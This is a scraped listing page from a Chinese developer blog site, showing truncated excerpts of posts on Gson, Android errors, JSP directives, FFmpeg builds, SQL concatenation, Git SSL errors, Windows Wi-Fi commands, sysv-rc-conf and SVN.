    转载请出自出处:http://eksliang.iteye.com/blog/2175473 一.概述     GsonBuilder用来定制java跟json之间的转换格式   二.基本使用 实体测试类: 温馨提示:默认情况下@Expose注解是不起作用的,除非你用GsonBuilder创建Gson的时候调用了GsonBuilder.excludeField
  • 报ClassNotFoundException: Didn't find class "...Activity" on path: DexPathList gundumw100 android
    有一个工程,本来运行是正常的,我想把它移植到另一台PC上,结果报: java.lang.RuntimeException: Unable to instantiate activity ComponentInfo{com.mobovip.bgr/com.mobovip.bgr.MainActivity}: java.lang.ClassNotFoundException: Didn't f
  • JavaWeb之JSP指令 ihuning javaweb
      要点   JSP指令简介  page指令  include指令    JSP指令简介    JSP指令(directive)是为JSP引擎而设计的,它们并不直接产生任何可见输出,而只是告诉引擎如何处理JSP页面中的其余部分。 JSP指令的基本语法格式: <%@ 指令 属性名="
  • mac上编译FFmpeg跑ios 啸笑天 ffmpeg
    1、下载文件:https://github.com/libav/gas-preprocessor, 复制gas-preprocessor.pl到/usr/local/bin/下, 修改文件权限:chmod 777 /usr/local/bin/gas-preprocessor.pl 2、安装yasm-1.2.0 curl http://www.tortall.net/projects/yasm
  • sql mysql oracle中字符串连接 macroli oraclesqlmysqlSQL Server
    有的时候,我们有需要将由不同栏位获得的资料串连在一起。每一种资料库都有提供方法来达到这个目的: MySQL: CONCAT() Oracle: CONCAT(), || SQL Server: + CONCAT() 的语法如下: Mysql 中 CONCAT(字串1, 字串2, 字串3, ...): 将字串1、字串2、字串3,等字串连在一起。 请注意,Oracle的CON
  • Git fatal: unab SSL certificate problem: unable to get local issuer ce rtificate qiaolevip 学习永无止境每天进步一点点git纵观千象
    // 报错如下: $ git pull origin master fatal: unable to access 'https://git.xxx.com/': SSL certificate problem: unable to get local issuer ce rtificate   // 原因: 由于git最新版默认使用ssl安全验证,但是我们是使用的git未设
  • windows命令行设置wifi surfingll windowswifi笔记本wifi
    还没有讨厌无线wifi的无尽广告么,还在耐心等待它慢慢启动么 教你命令行设置 笔记本电脑wifi: 1、开启wifi命令 netsh wlan set hostednetwork mode=allow ssid=surf8 key=bb123456 netsh wlan start hostednetwork pause 其中pause是等待输入,可以去掉 2、
  • Linux(Ubuntu)下安装sysv-rc-conf wmlJava linuxubuntusysv-rc-conf
    安装:sudo apt-get install sysv-rc-conf 使用:sudo sysv-rc-conf 操作界面十分简洁,你可以用鼠标点击,也可以用键盘方向键定位,用空格键选择,用Ctrl+N翻下一页,用Ctrl+P翻上一页,用Q退出。     背景知识 sysv-rc-conf是一个强大的服务管理程序,群众的意见是sysv-rc-conf比chkconf
  • svn切换环境,重发布应用多了javaee标签前缀 zengshaotao javaee
    更换了开发环境,从杭州,改变到了上海。svn的地址肯定要切换的,切换之前需要将原svn自带的.svn文件信息删除,可手动删除,也可通过废弃原来的svn位置提示删除.svn时删除。   然后就是按照最新的svn地址和规范建立相关的目录信息,再将原来的纯代码信息上传到新的环境。然后再重新检出,这样每次修改后就可以看到哪些文件被修改过,这对于增量发布的规范特别有用。   检出
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他